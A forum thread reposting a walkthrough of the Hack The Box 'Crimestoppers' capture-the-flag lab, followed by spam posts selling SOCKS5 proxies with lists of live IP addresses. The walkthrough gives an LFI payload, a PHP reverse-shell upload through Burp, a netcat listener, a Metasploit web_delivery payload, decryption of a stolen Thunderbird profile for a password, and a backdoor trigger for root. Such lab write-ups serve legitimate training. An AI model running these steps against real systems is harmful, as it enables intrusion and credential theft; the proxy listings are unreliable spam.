Jump to content
Anastasis

Hack the Box Challenge: Crimestoppers Walkthrough

Recommended Posts

Anastasis

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Crimestoppers of Hack The Box. Solving this lab is not much easy, all you need is your penetration skill to solve this challenge.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Crimestoppers has IP: 10.10.10.69.

As we knew the initial stage is enumeration; therefore use nmap Aggressive scan for gathering target’s machine and running services information.

1.png?w=687&ssl=1

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image opened as shown below.  Here, we can see that it has two pages: home and upload but didn’t find anything suspicious.

2.png?w=687&ssl=1

So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as http://10.10.10.80/?op=view and went on the web browser to explore them.

3.1.png?w=687&ssl=1

At upload, you can upload any comment as a Tip, in order to provide some information. So we try to upload malicious code here but get failed each time.

If you will observe the URL http:// 10.10.10.80/?op=upload then you will realize that its look like that LFI.

3.png?w=687&ssl=1

But it was not easy that much to exact information by exploiting LFI with help of ../etc/password therefore by making little bit more effort and taking help from my previous article. We used curl command to find out the data from inside it with the help of PHP base64-encode.

1
curl http://10.10.10.80/?op=upload =php://filter/convert.base64-encode/resource=upload

As result, it returns base64 encode text which we need to decode.

5.png?w=687&ssl=1

To decode bsae64 encoded text follow below syntax and found a PHP script that was pointing toward some kind of token and secretname which was a link to uploads directory.

Syntax: echo BASE64TEXT | base64 -d

6.png?w=687&ssl=1

After struggling a lot, finally, we successfully uploaded our php backdoor with help burp suite. Follow given step to upload php web shell.

Open php-reverse-shell.php which is inbuilt in kali Linux from path: /user/share/webshells/php and modify ATTACKER’s IP and save this file on the desktop. Here we have renamed it as shell.php and compress this file.

1
zip -0 shell.zip shell.php

8.png?w=687&ssl=1

In order to capture the request web browser, enter the information for Tips and name then turn burp suite and click on Send Tip.  

9.png?w=687&ssl=1

Now in order to upload the content of our php backdoor through burp select the string “shell” for name = tip as shown below.

10.png?w=687&ssl=1

And choose php file to paste it content at the place of shell.

11.png?w=687&ssl=1

As you can observe that we have successfully uploaded our malicious PHP content here.

12.png?w=687&ssl=1

Now forward the intercepted request and you will get secretname for the uploaded file as highlighted, copy it. Then forward the request again, it will give the success.txt message and at last forward the request one more time.

13.png?w=687&ssl=1

Do not forget to launch netcat for reverse connection before executing your uploaded file.

nc -lvp 1234

Now open the browser and execute the following command that contains secretname of the uploaded file (PHP backdoor) and you will get netcat session for reverse connection.

1
2
http://10.10.10.80/?op=zip://uploads/10.10.14.25/e0d7a2f54d16633eb0eddfb10efed8ea5a200274%23shell
python -c 'import pty; pty.spawn("/bin/sh")'

 14.png?w=687&ssl=1

Because we love to work with meterpreter session therefore with help of metasploit web_delivary module we generate malicious python code as shown.

1
2
3
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
msf exploit(multi/script/web_delivery) > exploit

15.png?w=687&ssl=1

Paste copied code in netcat which will provide meterpreter session inside Metasploit framework.

16.png?w=687&ssl=1

HURRAYYYY!!! We got our meterperter session, now let’s grab the user.txt file first.

Inside path: /home/dom I found user.txt file and used cat “filename” command for reading this file.

cd home

ls

cd dom

ls

cat user.txt

Great!! We got our 1st flag successfully

17.png?w=687&ssl=1

Now we need to find root.txt file to finish this challenge and believe me it was not easy until you won’t the hint which is hidden by the author. We try every possible method to escalated privilege to gain the root access but it was quite different from previous one.

After penetrating more and more we found a “36jinndk.default” from inside /home/dom/.thunderbird, which was encrypted file for Thunderbird profile, therefore, we download it in our local system.

1
meterpreter> download 36jinndk.default /root/Desktop/36

18.png?w=687&ssl=1

Since it was encrypted file of Thunderbird profile so with help of Google we found a python script from this Link: https://github.com/unode/firefox_decrypt for its decryption.

With help of the following command, we successfully found password: Gummer59

1
python firefox_decrypt.py /root/Desktop/36

19.png?w=687&ssl=1

We applied this password to escalated user:dom with help of the following command and then move into crimestoppers.htb directory it looks like his mailbox directory where we found so many files such INBOX.

1
2
3
su dome
Password:
cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb

20.png?w=687&ssl=1

First we look into INBOX for any hint for root.txt but didn’t find something related to root.txt flag similarly we open other files but didn’t found anything.

21.png?w=687&ssl=1

At last, we open Drafts-1 and read the following line which looks like a hint of root access.

“I don’t trust them and run rkhunter, it reported that there a rootkit installed called:apache_modrootme backdoor” and its execution method.

22.png?w=687&ssl=1

So we explore following the path we found the access.log.2.gz file since it was a compressed file, therefore, it was better to copy it inside /tmp for further steps.

1
2
cd /var/log/apache2
cp access.log.2.gz/tmp

Now let’s move inside /tmp to extract the copied file inside it with the help of gunzip.

1
2
3
gunzip access.log.2.gz
ls
cat access.log.2.gz

You can observe the log for a command “FunSociety” which has been executed several times.

23.png?w=687&ssl=1

As per the message read from DRAFT-1 we run netcat on localhost on port 80 get root access with help of following commands when executed.

1
2
3
4
nc localhost 80
get FunSociety
get FunSociety
id

Now let’s get the root.txt and finish this task.

1
2
cd /root
cat root.txt

BOOOOOM!!!! We hit the Goal and completed both task.J

24.png?w=687&ssl=1

 

 

Share this post


Link to post
Share on other sites
Deucalion

Στο LFI με ποια λογικη βαζει ισον"=" στο upload?

δλδ ?op=upload='LFI'

και οχι στο op δλδ ?op='LFI'

γενικα στις LFI επιθεσεις η συνταξη ειναι index.php?page=LFI

 

Share this post


Link to post
Share on other sites

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε προκειμένου να το δείτε

Πρέπει να είστε μέλος για να μπορέσετε να αφήσετε κάποιο σχόλιο

Δημιουργία λογαριασμού

Κάντε μια δωρεάν εγγραφή στην κοινότητά μας. Η εγγραφές μας είναι εύκολες.!

Εγγραφή τώρα

Σύνδεση

Εάν έχετε ήδη λογαριασμό σε αυτό το Forum; Συνδεθείτε εδώ.

Συνδεθείτε τώρα

  • Μηνύματα

    • dichvusocks
      Payment Instantly perfectmoney, bitcoin, wmtransfer, wex, ETH (Please click Buy Socks)
      Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/
      LIVE | 97.74.230.16:25129 | 0.11 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 52.56.217.135:9999 | 0.43 | London, City of | EC2V | ec2-52-56-217-135.eu-west-2.compute.amazonaws.com | United Kingdom | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 185.236.36.14:2080 | 1.65 | Unknow | Unknow | static.59.126.130.94.clients.your-server.de | Germany | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.207.71:34504 | 0.6 | Toscana | 52100 | server.kimos.eu | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:47483 | 0.55 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.74:19568 | 2.35 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:2874 | 0.09 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:18348 | 2.09 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.230.142:34040 | 0.58 | Toscana | 52100 | webcoe.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.237.123:37782 | 2.97 | Arizona | 85260 | ip-50-62-35-225.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 157.119.207.11:6667 | 1.1 | Maharashtra | 415001 | N/A | India | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 94.177.170.43:6673 | 0.62 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 103.250.153.211:6667 | 1.63 | Gujarat | 382355 | N/A | India | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 91.206.30.204:3129 | 0.66 | Kyyiv | 03057 | d976979.freehost.com.ua | Ukraine | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 60.248.223.190:3021 | 1.6 | Unknow | Unknow | 124-11-169-37.static.tfn.net.tw | Taiwan | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.218.61:26125 | 2.45 | Arizona | 85260 | ip-192-169-218-61.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.62.31.143:28124 | 0.12 | Arizona | 85260 | ip-192-169-196-5.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:6541 | 0.56 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
    • vn5socks.net
      LIVE ~ 159.65.136.30:2016 | 0.064 | Dallas | TX | 75231 | United States | Checked at vn5socks.net
      LIVE ~ 45.63.28.79:31004 | 0.157 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 97.74.230.16:63221 | 0.187 | Scottsdale | AZ | 85260 | United States | Checked at vn5socks.net
      LIVE ~ 207.154.248.155:2016 | 0.194 | West Hollywood | CA | 90069 | United States | Checked at vn5socks.net
      LIVE ~ 140.113.66.19:9050 | 0.07 | Hsinchu | 04 | Unknown | Taiwan | Checked at vn5socks.net
      LIVE ~ 50.62.35.225:42832 | 0.213 | Scottsdale | AZ | 85260 | United States | Checked at vn5socks.net
      LIVE ~ 50.63.153.173:6176 | 0.193 | Scottsdale | AZ | 85260 | United States | Checked at vn5socks.net
      LIVE ~ 95.213.130.42:8181 | 0.294 | Unknown | Unknown | Unknown | Russian Federation | Checked at vn5socks.net
      LIVE ~ 192.169.233.35:41079 | 0.358 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 192.169.233.2:20893 | 0.358 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 95.132.129.98:55580 | 0.262 | Kiev | 12 | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 176.37.121.85:2580 | 0.293 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 195.3.156.46:55580 | 0.302 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 91.219.31.254:2018 | 0.295 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 91.231.87.174:5055 | 0.299 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
      LIVE ~ 12.90.33.234:47703 | 0.189 | San Jose | CA | Unknown | United States | Checked at vn5socks.net
      LIVE ~ 107.151.139.187:2016 | 0.173 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 78.26.207.173:30013 | 0.29 | Unknown | Unknown | Unknown | Ukraine | Checked at vn5socks.net
    • tisocks
      SOCKS Proxy List by Tisocks.net
      If you Need Socks5 , Please visit service and add fund via PM , BTC WMZ , WEX . Thanks all!!
      Add fund : https://tisocks.net/addfund
      Check socks5 Online here : https://checksocks5.com
      LIVE | 95.110.229.22:60063 | 0.42 | SOCKS5 | Toscana | 52100 | www.freestyleweb.it | Italy | Checked at https://tisocks.net
      LIVE | 95.110.194.245:63343 | 0.421 | SOCKS5 | Toscana | 52100 | hosting.terastudio.it | Italy | Checked at https://tisocks.net
      LIVE | 108.59.8.86:27782 | 0.243 | SOCKS5 | South Carolina | 29575 | mta.backbone-tech.com | United States | Checked at https://tisocks.net
      LIVE | 95.110.207.71:34504 | 0.415 | SOCKS5 | Toscana | 52100 | server.kimos.eu | Italy | Checked at https://tisocks.net
      LIVE | 31.148.219.150:1443 | 0.883 | SOCKS5 | Unknow | Unknow | aurora.enn.lu | Anonymous Proxy | Checked at https://tisocks.net
      LIVE | 103.250.153.220:6667 | 0.936 | SOCKS5 | Gujarat | 382355 | N/A | India | Checked at https://tisocks.net
      LIVE | 132.148.129.183:64699 | 0.36 | SOCKS5 | California | 92603 | ip-132-148-129-183.ip.secureserver.net | United States | Checked at https://tisocks.net
      LIVE | 217.160.95.120:8470 | 0.369 | SOCKS5 | Unknow | Unknow | s16157228.onlinehome-server.info | Germany | Checked at https://tisocks.net
      LIVE | 91.122.14.44:56792 | 0.523 | SOCKS5 | Saint Petersburg City | 190923 | ppp91-122-14-44.pppoe.avangarddsl.ru | Russian Federation | Checked at https://tisocks.net
      LIVE | 91.142.208.125:62216 | 0.432 | SOCKS5 | Madrid | 28001 | tangerinrestore.vservers.es | Spain | Checked at https://tisocks.net
      LIVE | 221.153.75.187:2542 | 0.771 | SOCKS5 | Unknow | Unknow | | Unknow | Checked at https://tisocks.net
      LIVE | 64.118.87.8:62645 | 0.685 | SOCKS5 | New Jersey | 07310 | drive500.123servers.com | United States | Checked at https://tisocks.net
      LIVE | 91.122.14.44:8411 | 0.522 | SOCKS5 | Saint Petersburg City | 190923 | ppp91-122-14-44.pppoe.avangarddsl.ru | Russian Federation | Checked at https://tisocks.net
      LIVE | 91.122.14.44:63874 | 0.526 | SOCKS5 | Saint Petersburg City | 190923 | ppp91-122-14-44.pppoe.avangarddsl.ru | Russian Federation | Checked at https://tisocks.net
      LIVE | 125.227.69.220:3261 | 0.878 | SOCKS5 | Unknow | Unknow | 111-253-81-11.dynamic-ip.hinet.net | Taiwan | Checked at https://tisocks.net
       
    • shopsocks5.com
      [Shopsocks5.com] Service Socks5 Cheap
      Payment Instantly Perfectmoney, Bitcoin, Wmtransfer, BTC-E ( Please click Buy Socks )
      Check Socks Online  http://shopsocks5.com/check/




        Live | 159.65.136.30:2016 | United States | Dallas | TX | 75231 | Checked at Shopsocks5.com Live | 94.177.170.43:53288 | Italy | Arezzo | 16 | 52100 | Checked at Shopsocks5.com Live | 50.62.31.143:28124 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com Live | 45.63.28.79:31004 | United States | Dallas | TX | 75207 | Checked at Shopsocks5.com Live | 95.213.130.42:8181 | Russia | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 78.155.219.48:8000 | Russia | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 66.110.216.221:39603 | United States | Atlanta | GA | 30328 | Checked at Shopsocks5.com Live | 91.206.30.204:3129 | Ukraine | Kiev | 12 | Unknown | Checked at Shopsocks5.com Live | 42.112.20.116:7200 | Vietnam | Hanoi | 44 | Unknown | Checked at Shopsocks5.com Live | 132.148.129.183:64699 | United States | Minneapolis | MN | 55488 | Checked at Shopsocks5.com Live | 94.177.170.43:6673 | Italy | Arezzo | 16 | 52100 | Checked at Shopsocks5.com Live | 60.248.223.190:3256 | Taiwan | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 91.206.30.205:3129 | Ukraine | Kiev | 12 | Unknown | Checked at Shopsocks5.com Live | 178.32.227.169:30038 | France | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 217.160.95.120:8470 | Germany | Unknown | Unknown | Unknown | Checked at Shopsocks5.com Live | 50.63.153.173:46311 | United States | Scottsdale | AZ | 85260 | Checked at Shopsocks5.com
    • dichvusocks
      Payment Instantly perfectmoney, bitcoin, wmtransfer, wex, ETH (Please click Buy Socks)
      Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/
      LIVE | 50.63.153.173:6176 | 0.75 | Arizona | 85260 | ip-50-63-153-173.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 217.160.95.120:8470 | 0.54 | Unknow | Unknow | s16157228.onlinehome-server.info | Germany | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.62.35.225:42832 | 0.12 | Arizona | 85260 | ip-50-62-35-225.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:26147 | 0.09 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:25129 | 0.11 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 82.77.53.222:10080 | 0.64 | Bihor | 410001 | mail.varad.org | Romania | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.224.30:53156 | 2.12 | Toscana | 52100 | ecommerce.eniaweb.com | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:63221 | 1.37 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:55926 | 0.09 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 97.74.230.16:50112 | 0.14 | Arizona | 85260 | ip-97-74-230-16.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.227.5:53773 | 0.7 | Toscana | 52100 | host5-227-110-95.serverdedicati.aruba.it | Italy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 150.129.54.102:6667 | 1.23 | Gujarat | 370001 | N/A | India | Blacklist: No | Checked at http://dichvusocks.us
      LIVE | 27.116.51.124:6667 | 1.57 | Gujarat | 383205 | N/A | India | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 46.105.57.149:7435 | 1.54 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 94.177.170.43:32949 | 0.58 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 178.32.227.169:30038 | 0.51 | Unknow | Unknow | ispconfig02.dsa.servergurus.de | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.74:50645 | 1.91 | Arizona | 85260 | ip-192-169-140-74.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.153.173:24960 | 0.09 | Arizona | 85260 | ip-50-63-153-173.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
       
×